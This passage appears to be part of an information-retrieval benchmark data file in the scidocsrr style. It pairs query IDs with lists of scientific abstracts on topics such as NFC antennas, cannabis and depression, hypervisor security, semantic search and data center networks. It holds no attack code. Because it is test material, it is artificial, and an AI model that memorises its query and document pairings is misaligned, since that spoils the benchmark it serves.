"text": "The evaluation of interpretable machine learning systems is challenging, as explanation is almost always a means toward some downstream task. In this work, we carefully control a number of properties of logic-based explanations (overall length, number of repeated terms, etc.) to determine their effect on human ability to perform three basic tasks: simulating the system’s response, verification of a suggested response, and counterfactual reasoning. Our findings about how each of these properties affect the ability of humans to perform each task provide insights on how we might construct regularizers to optimize for task performance.",
"title": ""
},
{
"docid": "77ac062b64cf9bb08d4115326504dbeb",
"text": "Near Field Communication (NFC) is a very intuitive way to open a communication link, to authenticate, or to implement a payment by simply bringing two mobile personal devices closely together. NFC is based upon reliable contactless card technology and combines most prominent protocol standards in a specification driven by the NFC Forum. Devices with a NFC interface operate at 13.56 MHz via inductive loop antennas. However, these operate operated in a very different environment than contactless cards. Metal, the presence of several other antennas, and market demands for compact electronic devices are driving requirements for antennas to operate on ferrite foils, resulting in significant tolerances on antenna impedance. In NFC Reader mode, the antennas operate in a resonance circuit, making this de-tuning critical. This paper presents a prototype implementation for automated antenna impedance adjustment based upon Digitally Tunable Capacitors (DTCs). To show the benefit, the paper explains efficiency for contactless power transfer by practical measurements, comparing three scenarios-fixed impedance adjustment, matching with tolerance, and automated readjustment using a DTC.",
"title": ""
},
{
"docid": "77ea0e24066d028d085069cb8f6733e0",
"text": "Road scene reconstruction is a fundamental and crucial module at the perception phase for autonomous vehicles, and will influence the later phase, such as object detection, motion planing and path planing. Traditionally, self-driving car uses Lidar, camera or fusion of the two kinds of sensors for sensing the environment. However, single Lidar or camera-based approaches will miss crucial information, and the fusion-based approaches often consume huge computing resources. We firstly propose a conditional Generative Adversarial Networks (cGANs)-based deep learning model that can rebuild rich semantic scene images from upsampled Lidar point clouds only. This makes it possible to remove cameras to reduce resource consumption and improve the processing rate. Simulation on the KITTI dataset also demonstrates that our model can reestablish color imagery from a single Lidar point cloud, and is effective enough for real time sensing on autonomous driving vehicles.",
"title": ""
},
{
"docid": "cc432f79b99f348863e1371dd1511b77",
"text": "Most evaluation metrics for machine translation (MT) require reference translations for each sentence in order to produce a score reflecting certain aspects of its quality. The de facto metrics, BLEU and NIST, are known to have good correlation with human evaluation at the corpus level, but this is not the case at the segment level. As an attempt to overcome these two limitations, we address the problem of evaluating the quality of MT as a prediction task, where reference-independent features are extracted from the input sentences and their translation, and a quality score is obtained based on models produced from training data. We show that this approach yields better correlation with human evaluation as compared to commonly used metrics, even with models trained on different MT systems, language-pairs and text domains.",
"title": ""
},
{
"docid": "a4d8b3e9f60dfe8adbc95448a9feea2e",
"text": "In this article, I discuss material which is related to the recent proof of Fermat’s Last Theorem: elliptic curves, modular forms, Galois representations and their deformations, Frey’s construction, and the conjectures of Serre and of Taniyama-Shimura.",
"title": ""
},
{
"docid": "73d9461101dc15f93f52d2ab9b8c0f39",
"text": "The need for mining structured data has increased in the past few years. One of the best studied data structures in computer science and discrete mathematics are graphs. It can therefore be no surprise that graph based data mining has become quite popular in the last few years.This article introduces the theoretical basis of graph based data mining and surveys the state of the art of graph-based data mining. Brief descriptions of some representative approaches are provided as well.",
"title": ""
},
{
"docid": "39b5095283fd753013c38459a93246fd",
"text": "OBJECTIVE\nTo determine whether cannabis use in adolescence predisposes to higher rates of depression and anxiety in young adulthood.\n\n\nDESIGN\nSeven wave cohort study over six years.\n\n\nSETTING\n44 schools in the Australian state of Victoria.\n\n\nPARTICIPANTS\nA statewide secondary school sample of 1601 students aged 14-15 followed for seven years.\n\n\nMAIN OUTCOME MEASURE\nInterview measure of depression and anxiety (revised clinical interview schedule) at wave 7.\n\n\nRESULTS\nSome 60% of participants had used cannabis by the age of 20; 7% were daily users at that point. Daily use in young women was associated with an over fivefold increase in the odds of reporting a state of depression and anxiety after adjustment for intercurrent use of other substances (odds ratio 5.6, 95% confidence interval 2.6 to 12). Weekly or more frequent cannabis use in teenagers predicted an approximately twofold increase in risk for later depression and anxiety (1.9, 1.1 to 3.3) after adjustment for potential baseline confounders. In contrast, depression and anxiety in teenagers predicted neither later weekly nor daily cannabis use.\n\n\nCONCLUSIONS\nFrequent cannabis use in teenage girls predicts later depression and anxiety, with daily users carrying the highest risk. Given recent increasing levels of cannabis use, measures to reduce frequent and heavy recreational use seem warranted.",
"title": ""
},
{
"docid": "e7f91b90eab54dfd7f115a3a0225b673",
"text": "The recent trend of outsourcing network functions, aka. middleboxes, raises confidentiality and integrity concern on redirected packet, runtime state, and processing result. The outsourced middleboxes must be protected against cyber attacks and malicious service provider. It is challenging to simultaneously achieve strong security, practical performance, complete functionality and compatibility. Prior software-centric approaches relying on customized cryptographic primitives fall short of fulfilling one or more desired requirements. In this paper, after systematically addressing key challenges brought to the fore, we design and build a secure SGX-assisted system, LightBox, which supports secure and generic middlebox functions, efficient networking, and most notably, lowoverhead stateful processing. LightBox protects middlebox from powerful adversary, and it allows stateful network function to run at nearly native speed: it adds only 3μs packet processing delay even when tracking 1.5M concurrent flows.",
"title": ""
},
{
"docid": "a66765e24b6cfdab2cc0b30de8afd12e",
"text": "A broadband transition structure from rectangular waveguide (RWG) to microstrip line (MSL) is presented for the realization of the low-loss packaging module using Low-temperature co-fired ceramic (LTCC) technology at W-band. In this transition, a cavity structure is buried in LTCC layers, which provides the wide bandwidth, and a laminated waveguide (LWG) transition is designed, which provides the low-loss performance, as it reduces the radiation loss of conventional direct transition between RWG and MSL. The design procedure is also given. The measured results show that the insertion loss of better than 0.7 dB from 86 to 97 GHz can be achieved.",
"title": ""
},
{
"docid": "cfad1e8941f0a60f6978493c999a5850",
"text": "We propose SecVisor, a tiny hypervisor that ensures code integrity for commodity OS kernels. In particular, SecVisor ensures that only user-approved code can execute in kernel mode over the entire system lifetime. This protects the kernel against code injection attacks, such as kernel rootkits. SecVisor can achieve this propertyeven against an attacker who controls everything but the CPU, the memory controller, and system memory chips. Further, SecVisor can even defend against attackers with knowledge of zero-day kernel exploits.\n Our goal is to make SecVisor amenable to formal verificationand manual audit, thereby making it possible to rule out known classes of vulnerabilities. To this end, SecVisor offers small code size and small external interface. We rely on memory virtualization to build SecVisor and implement two versions, one using software memory virtualization and the other using CPU-supported memory virtualization. The code sizes of the runtime portions of these versions are 1739 and 1112 lines, respectively. The size of the external interface for both versions of SecVisor is 2 hypercalls. It is easy to port OS kernels to SecVisor. We port the Linux kernel version 2.6.20 by adding 12 lines and deleting 81 lines, out of a total of approximately 4.3 million lines of code in the kernel.",
"title": ""
},
{
"docid": "4fea6fb309d496f9b4fd281c80a8eed7",
"text": "Network alignment is the problem of matching the nodes of two graphs, maximizing the similarity of the matched nodes and the edges between them. This problem is encountered in a wide array of applications---from biological networks to social networks to ontologies---where multiple networked data sources need to be integrated. Due to the difficulty of the task, an accurate alignment can rarely be found without human assistance. Thus, it is of great practical importance to develop network alignment algorithms that can optimally leverage experts who are able to provide the correct alignment for a small number of nodes. Yet, only a handful of existing works address this active network alignment setting.\n The majority of the existing active methods focus on absolute queries (\"are nodes a and b the same or not?\"), whereas we argue that it is generally easier for a human expert to answer relative queries (\"which node in the set b1,...,bn is the most similar to node a?\"). This paper introduces two novel relative-query strategies, TopMatchings and GibbsMatchings, which can be applied on top of any network alignment method that constructs and solves a bipartite matching problem. Our methods identify the most informative nodes to query by sampling the matchings of the bipartite graph associated to the network-alignment instance.\n We compare the proposed approaches to several commonly-used query strategies and perform experiments on both synthetic and real-world datasets. Our sampling-based strategies yield the highest overall performance, outperforming all the baseline methods by more than 15 percentage points in some cases. In terms of accuracy, TopMatchings and GibbsMatchings perform comparably. However, GibbsMatchings is significantly more scalable, but it also requires hyperparameter tuning for a temperature parameter.",
"title": ""
},
{
"docid": "026191acb86a5c59889e0cf0491a4f7d",
"text": "We present a new dataset, ideal for Head Pose and Eye Gaze Estimation algorithm testings. Our dataset was recorded using a monocular system, and no information regarding camera or environment parameters is offered, making the dataset ideal to be tested with algorithms that do not utilize such information and do not require any specific equipment in terms of hardware.",
"title": ""
},
{
"docid": "ab0994331a2074fe9b635342fed7331c",
"text": "This paper investigates to identify the requirement and the development of machine learning-based mobile big data analysis through discussing the insights of challenges in the mobile big data (MBD). Furthermore, it reviews the state-of-the-art applications of data analysis in the area of MBD. Firstly, we introduce the development of MBD. Secondly, the frequently adopted methods of data analysis are reviewed. Three typical applications of MBD analysis, namely wireless channel modeling, human online and offline behavior analysis, and speech recognition in the internet of vehicles, are introduced respectively. Finally, we summarize the main challenges and future development directions of mobile big data analysis.",
"title": ""
},
{
"docid": "a9ebd89c2f9c9b33ed9c69b4a9da221a",
"text": "Continuum robots, which have continuous mechanical structures comparable to the flexibility in elephant trunks and octopus arms, have been primarily geared toward the medical and defense communities. In space, however, NASA projects these robots to have a place in irregular inspection routines. The inherent compliance and bending of these continuum arms are especially suitable for inspection in obstructed spaces to ensure proper equipment functionality. In this paper, we propose a new solution that improves on the functionality of previous continuum robots, via a novel mechanical scaly layer-jamming design. Layer-jamming assisted continuum arms have previously required pneumatic sources for actuation, which limit their portability and usage in aerospace applications. This paper combines the compliance of continuum arms and stiffness modulation of the layer jamming mechanism to design a new hybrid layer jamming continuum arm. The novel design uses an electromechanical actuation which eliminates the pneumatic actuation therefore making it compact and portable.",
"title": ""
},
{
"docid": "6149a6aaa9c39a1e02ab8fbe64fcb62b",
"text": "The thoracic diaphragm is a dome-shaped septum, composed of muscle surrounding a central tendon, which separates the thoracic and abdominal cavities. The function of the diaphragm is to expand the chest cavity during inspiration and to promote occlusion of the gastroesophageal junction. This article provides an overview of the normal anatomy of the diaphragm.",
"title": ""
}
] | scidocsrr |
4bc498fa731cf17216b887d0f0891bbb | User identification across multiple social networks | [
{
"docid": "d879e53880baeb2da303179195731b03",
"text": "Semantic search has been one of the motivations of the semantic Web since it was envisioned. We propose a model for the exploitation of ontology-based knowledge bases to improve search over large document repositories. In our view of information retrieval on the semantic Web, a search engine returns documents rather than, or in addition to, exact values in response to user queries. For this purpose, our approach includes an ontology-based scheme for the semiautomatic annotation of documents and a retrieval system. The retrieval model is based on an adaptation of the classic vector-space model, including an annotation weighting algorithm, and a ranking algorithm. Semantic search is combined with conventional keyword-based retrieval to achieve tolerance to knowledge base incompleteness. Experiments are shown where our approach is tested on corpora of significant scale, showing clear improvements with respect to keyword-based search",
"title": ""
}
] | [
{
"docid": "9ed3ec5936c2e4fd383618ab11b4a07e",
"text": "With the large-scale adoption of GPS equipped mobile sensing devices, positional data generated by moving objects (e.g., vehicles, people, animals) are being easily collected. Such data are typically modeled as streams of spatio-temporal (x,y,t) points, called trajectories. In recent years trajectory management research has progressed significantly towards efficient storage and indexing techniques, as well as suitable knowledge discovery. These works focused on the geometric aspect of the raw mobility data. We are now witnessing a growing demand in several application sectors (e.g., from shipment tracking to geo-social networks) on understanding the semantic behavior of moving objects. Semantic behavior refers to the use of semantic abstractions of the raw mobility data, including not only geometric patterns but also knowledge extracted jointly from the mobility data and the underlying geographic and application domains information. The core contribution of this article lies in a semantic model and a computation and annotation platform for developing a semantic approach that progressively transforms the raw mobility data into semantic trajectories enriched with segmentations and annotations. We also analyze a number of experiments we did with semantic trajectories in different domains.",
"title": ""
},
{
"docid": "9649b5411f6d90b18b2e0ec1a2620952",
"text": "This paper describes a method for the enhancement of curvilinear structures such as vessels and bronchi in three-dimensional (3-D) medical images. A 3-D line enhancement filter is developed with the aim of discriminating line structures from other structures and recovering line structures of various widths. The 3-D line filter is based on a combination of the eigenvalues of the 3-D Hessian matrix. Multi-scale integration is formulated by taking the maximum among single-scale filter responses, and its characteristics are examined to derive criteria for the selection of parameters in the formulation. The resultant multi-scale line-filtered images provide significantly improved segmentation and visualization of curvilinear structures. The usefulness of the method is demonstrated by the segmentation and visualization of brain vessels from magnetic resonance imaging (MRI) and magnetic resonance angiography (MRA), bronchi from a chest CT, and liver vessels (portal veins) from an abdominal CT.",
"title": ""
},
{
"docid": "10bc2f9827aa9a53e3ca4b7188bd91c3",
"text": "Learning hash functions across heterogenous high-dimensional features is very desirable for many applications involving multi-modal data objects. In this paper, we propose an approach to obtain the sparse codesets for the data objects across different modalities via joint multi-modal dictionary learning, which we call sparse multi-modal hashing (abbreviated as SM2H). In SM2H, both intra-modality similarity and inter-modality similarity are first modeled by a hypergraph, then multi-modal dictionaries are jointly learned by Hypergraph Laplacian sparse coding. Based on the learned dictionaries, the sparse codeset of each data object is acquired and conducted for multi-modal approximate nearest neighbor retrieval using a sensitive Jaccard metric. The experimental results show that SM2H outperforms other methods in terms of mAP and Percentage on two real-world data sets.",
"title": ""
},
{
"docid": "94af221c857462b51e14f527010fccde",
"text": "The immunology of the hygiene hypothesis of allergy is complex and involves the loss of cellular and humoral immunoregulatory pathways as a result of the adoption of a Western lifestyle and the disappearance of chronic infectious diseases. The influence of diet and reduced microbiome diversity now forms the foundation of scientific thinking on how the allergy epidemic occurred, although clear mechanistic insights into the process in humans are still lacking. Here we propose that barrier epithelial cells are heavily influenced by environmental factors and by microbiome-derived danger signals and metabolites, and thus act as important rheostats for immunoregulation, particularly during early postnatal development. Preventive strategies based on this new knowledge could exploit the diversity of the microbial world and the way humans react to it, and possibly restore old symbiotic relationships that have been lost in recent times, without causing disease or requiring a return to an unhygienic life style.",
"title": ""
},
{
"docid": "6cabc50fda1107a61c2704c4917b9501",
"text": "A vehicle tracking system is very useful for tracking the movement of a vehicle from any location at any time. In this work, real time Google map and Arduino based vehicle tracking system is implemented with Global Positioning System (GPS) and Global system for mobile communication (GSM) technology. GPS module provides geographic coordinates at regular time intervals. Then the GSM module transmits the location of vehicle to cell phone of owner/user in terms of latitude and longitude. At the same time, location is displayed on LCD. Finally, Google map displays the location and name of the place on cell phone. Thus, owner/user will be able to continuously monitor a moving vehicle using the cell phone. In order to show the feasibility and effectiveness of the system, this work presents experimental result of the vehicle tracking system. The proposed system is user friendly and ensures safety and surveillance at low maintenance cost.",
"title": ""
},
{
"docid": "33078b816200d68685518464292d73a7",
"text": "Program Synthesis Without Full Specifications for Novel Applications Daniel Perelman Co-Chairs of the Supervisory Committee: Associate Professor Daniel Grossman Computer Science & Engineering Affiliate Professor Sumit Gulwani Computer Science & Engineering Program synthesis is a family of techniques that generate programs from a description of what the program should do but not how it should do it. By designing a program synthesis algorithm together with the user interaction model we show that by accepting small increases in user effort, it is easier to write the synthesizer and the need for specialization of the synthesizer to a given domain is reduced without losing performance. In this work, we target three tasks to show the breadth of our methodology: code completion, end-user programming-by-example for data transformations, and feedback for introductory programming assignments. For each of these tasks, we develop an interaction model and program synthesis algorithm together to best support the user. In the first, we use partial expressions to allow programmers to express exactly what they don’t know and want the completion system to fill in. In the second, we use the sequence of examples to inform building up larger programs iteratively. In the last, we use attempts from other students on the same assignment to mine corrections.",
"title": ""
},
{
"docid": "2271347e3b04eb5a73466aecbac4e849",
"text": "[1] Robin Jia, Percy Liang. “Adversarial examples for evaluating reading comprehension systems.” In EMNLP 2017. [2] Caiming Xiong, Victor Zhong, Richard Socher. “DCN+ Mixed objective and deep residual coattention for question answering.” In ICLR 2018. [3] Danqi Chen, Adam Fisch, Jason Weston, Antoine Bordes. “Reading wikipedia to answer open-domain questions.” In ACL 2017. Check out more of our work at https://einstein.ai/research Method",
"title": ""
},
{
"docid": "820c8869640edacb874fe7cccc265b13",
"text": "The present document may be made available in more than one electronic version or in print. In any case of existing or perceived difference in contents between such versions, the reference version is the Portable Document Format (PDF). In case of dispute, the reference shall be the printing on ETSI printers of the PDF version kept on a specific network drive within ETSI Secretariat. No part may be reproduced except as authorized by written permission. The copyright and the foregoing restriction extend to reproduction in all media. DECT TM , PLUGTESTS TM , UMTS TM and the ETSI logo are Trade Marks of ETSI registered for the benefit of its Members. 3GPP TM and LTE™ are Trade Marks of ETSI registered for the benefit of its Members and of the 3GPP Organizational Partners. GSM® and the GSM logo are Trade Marks registered and owned by the GSM Association.",
"title": ""
},
{
"docid": "79f4aad68ba11831c908dface92984a6",
"text": "Purely passive devices (e.g. dynamic ankle-foot orthoses (DAFOs)) can store and release elastic energy in rigid, non-hinged frames to assist walking without assistance from motors. This lightweight, simplistic approach has been shown to cause small increases in both walking speed and economy poststroke [6-8]. However there are downsides to current DAFO designs. First, rigid, non-hinged DAFOs restrict full ankle joint range of motion, allowing only limited rotation in the sagittal plane. Second, and perhaps more crucialcurrent DAFOs do not allow free ankle rotation during swing, making it difficult to dorsiflex in preparation for heel strike. Inability to dorsiflex freely during swing could impose a significant metabolic penalty, especially in healthy populations [9].",
"title": ""
},
{
"docid": "785bd7171800d3f2f59f90838a84dc37",
"text": "BACKGROUND\nCancer is considered to develop due to disruptions in the tissue microenvironment in addition to genetic disruptions in the tumor cells themselves. The two most important microenvironmental disruptions in cancer are arguably tissue hypoxia and disrupted circadian rhythmicity. Endothelial cells, which line the luminal side of all blood vessels transport oxygen or endocrine circadian regulators to the tissue and are therefore of key importance for circadian disruption and hypoxia in tumors.\n\n\nSCOPE OF REVIEW\nHere I review recent findings on the role of circadian rhythms and hypoxia in cancer and metastasis, with particular emphasis on how these pathways link tumor metastasis to pathological functions of blood vessels. The involvement of disrupted cell metabolism and redox homeostasis in this context and the use of novel zebrafish models for such studies will be discussed.\n\n\nMAJOR CONCLUSIONS\nCircadian rhythms and hypoxia are involved in tumor metastasis on all levels from pathological deregulation of the cell to the tissue and the whole organism. Pathological tumor blood vessels cause hypoxia and disruption in circadian rhythmicity which in turn drives tumor metastasis. Zebrafish models may be used to increase our understanding of the mechanisms behind hypoxia and circadian regulation of metastasis.\n\n\nGENERAL SIGNIFICANCE\nDisrupted blood flow in tumors is currently seen as a therapeutic goal in cancer treatment, but may drive invasion and metastasis via pathological hypoxia and circadian clock signaling. Understanding the molecular details behind such regulation is important to optimize treatment for patients with solid tumors in the future. This article is part of a Special Issue entitled Redox regulation of differentiation and de-differentiation.",
"title": ""
},
{
"docid": "b28f42d2a9a7287cf75a7936aa9865be",
"text": "This work presents a novel simulation methodology applied to a 5-DOF manipulator. The work includes mathematical modeling of the direct, inverse and differential kinematics as well as the dynamics of the manipulator. The method implements the path following in the 3D space and uses the Matlab-Simulink approach. Several paths were tested to verify the method. This methodology can be used with different robots to test the behavior and control laws.",
"title": ""
},
{
"docid": "77f60100af0c9556e5345ee1b04d8171",
"text": "SDNET2018 is an annotated image dataset for training, validation, and benchmarking of artificial intelligence based crack detection algorithms for concrete. SDNET2018 contains over 56,000 images of cracked and non-cracked concrete bridge decks, walls, and pavements. The dataset includes cracks as narrow as 0.06 mm and as wide as 25 mm. The dataset also includes images with a variety of obstructions, including shadows, surface roughness, scaling, edges, holes, and background debris. SDNET2018 will be useful for the continued development of concrete crack detection algorithms based on deep convolutional neural networks (DCNNs), which are a subject of continued research in the field of structural health monitoring. The authors present benchmark results for crack detection using SDNET2018 and a crack detection algorithm based on the AlexNet DCNN architecture. SDNET2018 is freely available at https://doi.org/10.15142/T3TD19.",
"title": ""
},
{
"docid": "9ac00559a52851ffd2e33e376dd58b62",
"text": "ARM servers are becoming increasingly common, making server technologies such as virtualization for ARM of growing importance. We present the first study of ARM virtualization performance on server hardware, including multicore measurements of two popular ARM and x86 hypervisors, KVM and Xen. We show how ARM hardware support for virtualization can enable much faster transitions between VMs and the hypervisor, a key hypervisor operation. However, current hypervisor designs, including both Type 1 hypervisors such as Xen and Type 2 hypervisors such as KVM, are not able to leverage this performance benefit for real application workloads. We discuss the reasons why and show that other factors related to hypervisor software design and implementation have a larger role in overall performance. Based on our measurements, we discuss changes to ARM's hardware virtualization support that can potentially bridge the gap to bring its faster VM-to-hypervisor transition mechanism to modern Type 2 hypervisors running real applications. These changes have been incorporated into the latest ARM architecture.",
"title": ""
},
{
"docid": "6a04b4da4e77decf5f783e2edcc81d5b",
"text": "Document-level sentiment classification is an important NLP task. The state of the art shows that attention mechanism is particularly effective on document-level sentiment classification. Despite the success of previous attention mechanism, it neglects the correlations among inputs (e.g., words in a sentence), which can be useful for improving the classification result. In this paper, we propose a novel Adaptive Attention Network (AAN) to explicitly model the correlations among inputs. Our AAN has a two-layer attention hierarchy. It first learns an attention score for each input. Given each input’s embedding and attention score, it then computes a weighted sum over all the words’ embeddings. This weighted sum is seen as a “context” embedding, aggregating all the inputs. Finally, to model the correlations among inputs, it computes another attention score for each input, based on the input embedding and the context embedding. These new attention scores are our final output of AAN. In document-level sentiment classification, we apply AAN to model words in a sentence and sentences in a review. We evaluate AAN on three public data sets, and show that it outperforms state-of-the-art baselines.",
"title": ""
},
{
"docid": "1b063dfecff31de929383b8ab74f7f6b",
"text": "This paper studies a class of adaptive gradient based momentum algorithms that update the search directions and learning rates simultaneously using past gradients. This class, which we refer to as the “Adam-type”, includes the popular algorithms such as Adam (Kingma & Ba, 2014) , AMSGrad (Reddi et al., 2018) , AdaGrad (Duchi et al., 2011). Despite their popularity in training deep neural networks (DNNs), the convergence of these algorithms for solving non-convex problems remains an open question. In this paper, we develop an analysis framework and a set of mild sufficient conditions that guarantee the convergence of the Adam-type methods, with a convergence rate of order O(log T/ √ T ) for non-convex stochastic optimization. Our convergence analysis applies to a new algorithm called AdaFom (AdaGrad with First Order Momentum). We show that the conditions are essential, by identifying concrete examples in which violating the conditions makes an algorithm diverge. Besides providing one of the first comprehensive analysis for Adam-type methods in the non-convex setting, our results can also help the practitioners to easily monitor the progress of algorithms and determine their convergence behavior.",
"title": ""
},
{
"docid": "36a616fb73473edecb1df2db0f3d1870",
"text": "We study online learnability of a wide class of problems, extending the results of Rakhlin et al. (2010a) to general notions of performance measure well beyond external regret. Our framework simultaneously captures such well-known notions as internal and general Φ-regret, learning with non-additive global cost functions, Blackwell's approachability, calibration of forecasters, and more. We show that learnability in all these situations is due to control of the same three quantities: a martingale convergence term, a term describing the ability to perform well if future is known, and a generalization of sequential Rademacher complexity, studied in Rakhlin et al. (2010a). Since we directly study complexity of the problem instead of focusing on efficient algorithms, we are able to improve and extend many known results which have been previously derived via an algorithmic construction. Disciplines Computer Sciences | Statistics and Probability This conference paper is available at ScholarlyCommons: http://repository.upenn.edu/statistics_papers/133 JMLR: Workshop and Conference Proceedings 19 (2011) 559–594 24th Annual Conference on Learning Theory Online Learning: Beyond Regret Alexander Rakhlin Department of Statistics University of Pennsylvania Karthik Sridharan TTI-Chicago Ambuj Tewari Department of Computer Science University of Texas at Austin Editor: Sham Kakade, Ulrike von Luxburg Abstract We study online learnability of a wide class of problems, extending the results of Rakhlin et al. (2010a) to general notions of performance measure well beyond external regret. Our framework simultaneously captures such well-known notions as internal and general Φregret, learning with non-additive global cost functions, Blackwell’s approachability, calibration of forecasters, and more. We show that learnability in all these situations is due to control of the same three quantities: a martingale convergence term, a term describing the ability to perform well if future is known, and a generalization of sequential Rademacher complexity, studied in Rakhlin et al. (2010a). Since we directly study complexity of the problem instead of focusing on efficient algorithms, we are able to improve and extend many known results which have been previously derived via an algorithmic construction.We study online learnability of a wide class of problems, extending the results of Rakhlin et al. (2010a) to general notions of performance measure well beyond external regret. Our framework simultaneously captures such well-known notions as internal and general Φregret, learning with non-additive global cost functions, Blackwell’s approachability, calibration of forecasters, and more. We show that learnability in all these situations is due to control of the same three quantities: a martingale convergence term, a term describing the ability to perform well if future is known, and a generalization of sequential Rademacher complexity, studied in Rakhlin et al. (2010a). Since we directly study complexity of the problem instead of focusing on efficient algorithms, we are able to improve and extend many known results which have been previously derived via an algorithmic construction.",
"title": ""
},
{
"docid": "9fb27226848da6b18fdc1e3b3edf79c9",
"text": "In the last few years thousands of scientific papers have investigated sentiment analysis, several startups that measure opinions on real data have emerged and a number of innovative products related to this theme have been developed. There are multiple methods for measuring sentiments, including lexical-based and supervised machine learning methods. Despite the vast interest on the theme and wide popularity of some methods, it is unclear which one is better for identifying the polarity (i.e., positive or negative) of a message. Accordingly, there is a strong need to conduct a thorough apple-to-apple comparison of sentiment analysis methods, as they are used in practice, across multiple datasets originated from different data sources. Such a comparison is key for understanding the potential limitations, advantages, and disadvantages of popular methods. This article aims at filling this gap by presenting a benchmark comparison of twenty-four popular sentiment analysis methods (which we call the state-of-the-practice methods). Our evaluation is based on a benchmark of eighteen labeled datasets, covering messages posted on social networks, movie and product reviews, as well as opinions and comments in news articles. Our results highlight the extent to which the prediction performance of these methods varies considerably across datasets. Aiming at boosting the development of this research area, we open the methods’ codes and datasets used in this article, deploying them in a benchmark system, which provides an open API for accessing and comparing sentence-level sentiment analysis methods.",
"title": ""
},
{
"docid": "d06c91afbfd79e40d0d6fe326e3be957",
"text": "This meta-analysis included 66 studies (N = 4,176) on parental antecedents of attachment security. The question addressed was whether maternal sensitivity is associated with infant attachment security, and what the strength of this relation is. It was hypothesized that studies more similar to Ainsworth's Baltimore study (Ainsworth, Blehar, Waters, & Wall, 1978) would show stronger associations than studies diverging from this pioneering study. To create conceptually homogeneous sets of studies, experts divided the studies into 9 groups with similar constructs and measures of parenting. For each domain, a meta-analysis was performed to describe the central tendency, variability, and relevant moderators. After correction for attenuation, the 21 studies (N = 1,099) in which the Strange Situation procedure in nonclinical samples was used, as well as preceding or concurrent observational sensitivity measures, showed a combined effect size of r(1,097) = .24. According to Cohen's (1988) conventional criteria, the association is moderately strong. It is concluded that in normal settings sensitivity is an important but not exclusive condition of attachment security. Several other dimensions of parenting are identified as playing an equally important role. In attachment theory, a move to the contextual level is required to interpret the complex transactions between context and sensitivity in less stable and more stressful settings, and to pay more attention to nonshared environmental influences.",
"title": ""
},
{
"docid": "760a303502d732ece14e3ea35c0c6297",
"text": "Data centers are experiencing a remarkable growth in the number of interconnected servers. Being one of the foremost data center design concerns, network infrastructure plays a pivotal role in the initial capital investment and ascertaining the performance parameters for the data center. Legacy data center network (DCN) infrastructure lacks the inherent capability to meet the data centers growth trend and aggregate bandwidth demands. Deployment of even the highest-end enterprise network equipment only delivers around 50% of the aggregate bandwidth at the edge of network. The vital challenges faced by the legacy DCN architecture trigger the need for new DCN architectures, to accommodate the growing demands of the ‘cloud computing’ paradigm. We have implemented and simulated the state of the art DCN models in this paper, namely: (a) legacy DCN architecture, (b) switch-based, and (c) hybrid models, and compared their effectiveness by monitoring the network: (a) throughput and (b) average packet delay. The presented analysis may be perceived as a background benchmarking study for the further research on the simulation and implementation of the DCN-customized topologies and customized addressing protocols in the large-scale data centers. We have performed extensive simulations under various network traffic patterns to ascertain the strengths and inadequacies of the different DCN architectures. Moreover, we provide a firm foundation for further research and enhancement in DCN architectures. Copyright © 2012 John Wiley & Sons, Ltd.",
"title": ""
},
{
"docid": "54afd49e0853e258916e2a36605177f0",
"text": "Novolac type liquefied wood/phenol/formaldehyde (LWPF) resins were synthesized from liquefied wood and formaldehyde. The average molecular weight of the LWPF resin made from the liquefied wood reacted in an atmospheric three neck flask increased with increasing P/W ratio. However, it decreased with increasing phenol/wood ratio when using a sealed Parr reactor. On average, the LWPF resin made from the liquefied wood reacted in the Parr reactor had lower molecular weight than those from the atmospheric three neck flask. The infrared spectra of the LWPF resins were similar to that of the conventional novolac resin but showed a major difference at the 1800–1600 cm-1 region. These results indicate that liquefied wood could partially substitute phenol in the novolac resin synthesis. The composites with the liquefied wood resin from the sealed Parr reactor yielded higher thickness swelling than those with the liquefied wood resin from the three neck flask likely due to the hydrophilic wood components incorporated in it and the lower cross-link density than the liquefied wood resin from the three neck flask during the resin cure process. Novolakartige LWPF-Harze wurden aus verflüssigtem Holz und Formaldehyd synthetisch hergestellt. Das mittlere Molekülgewicht des LWPF-Harzes, das aus verflüssigtem Holz in einem atmosphärischen Dreihals-Kolben hergestellt worden war, nahm mit steigendem Phenol/Holz-Verhältnis (P/W) zu, wohingegen es bei der Herstellung in einem versiegelten Parr Reaktor mit steigendem P/W-Verhältnis abnahm. LWPF-Harz, das aus verflüssigtem Holz in einem Parr Reaktor hergestellt worden war, hatte durchschnittlich ein niedrigeres Molekülgewicht als LWPF-Harz, das in einem atmosphärischen Dreihals-Kolben hergestellt worden war. Die Infrarot-Spektren der LWPF-Harze ähnelten denjenigen von konventionellem Novolak Harz, unterschieden sich jedoch im 1800–1600 cm-1 Bereich deutlich. Diese Ergebnisse zeigen, dass das Phenol bei der Synthese von Novolak-Harz teilweise durch verflüssigtes Holz ersetzt werden kann. Verbundwerkstoffe mit LWPF-Harz, das aus verflüssigtem Holz im versiegelten Parr Reaktor hergestellt worden war, wiesen eine höhere Dickenquellung auf als diejenigen mit LWPF-Harz, das im Dreihals-Kolben hergestellt worden war. Der Grund besteht wahrscheinlich in den im Vergleich zu LWPF-Harz aus dem Dreihals-Kolben eingebundenen hydrophilen Holzbestandteilen und der niedrigeren Vernetzungsdichte während der Aushärtung.",
"title": ""
}
] | scidocsrr |
adf6761365ce8f3912cb16ab6b490f61 | Relating Chronic Pelvic Pain and Endometriosis to Signs of Sensitization and Myofascial Pain and Dysfunction. | [
{
"docid": "fe30cb6b1643be8362c16743e0c7f70b",
"text": "The peripheral nervous and immune systems are traditionally thought of as serving separate functions. The line between them is, however, becoming increasingly blurred by new insights into neurogenic inflammation. Nociceptor neurons possess many of the same molecular recognition pathways for danger as immune cells, and, in response to danger, the peripheral nervous system directly communicates with the immune system, forming an integrated protective mechanism. The dense innervation network of sensory and autonomic fibers in peripheral tissues and high speed of neural transduction allows rapid local and systemic neurogenic modulation of immunity. Peripheral neurons also seem to contribute to immune dysfunction in autoimmune and allergic diseases. Therefore, understanding the coordinated interaction of peripheral neurons with immune cells may advance therapeutic approaches to increase host defense and suppress immunopathology.",
"title": ""
}
] | [
{
"docid": "cbfd6bf45521082645664d68f366246e",
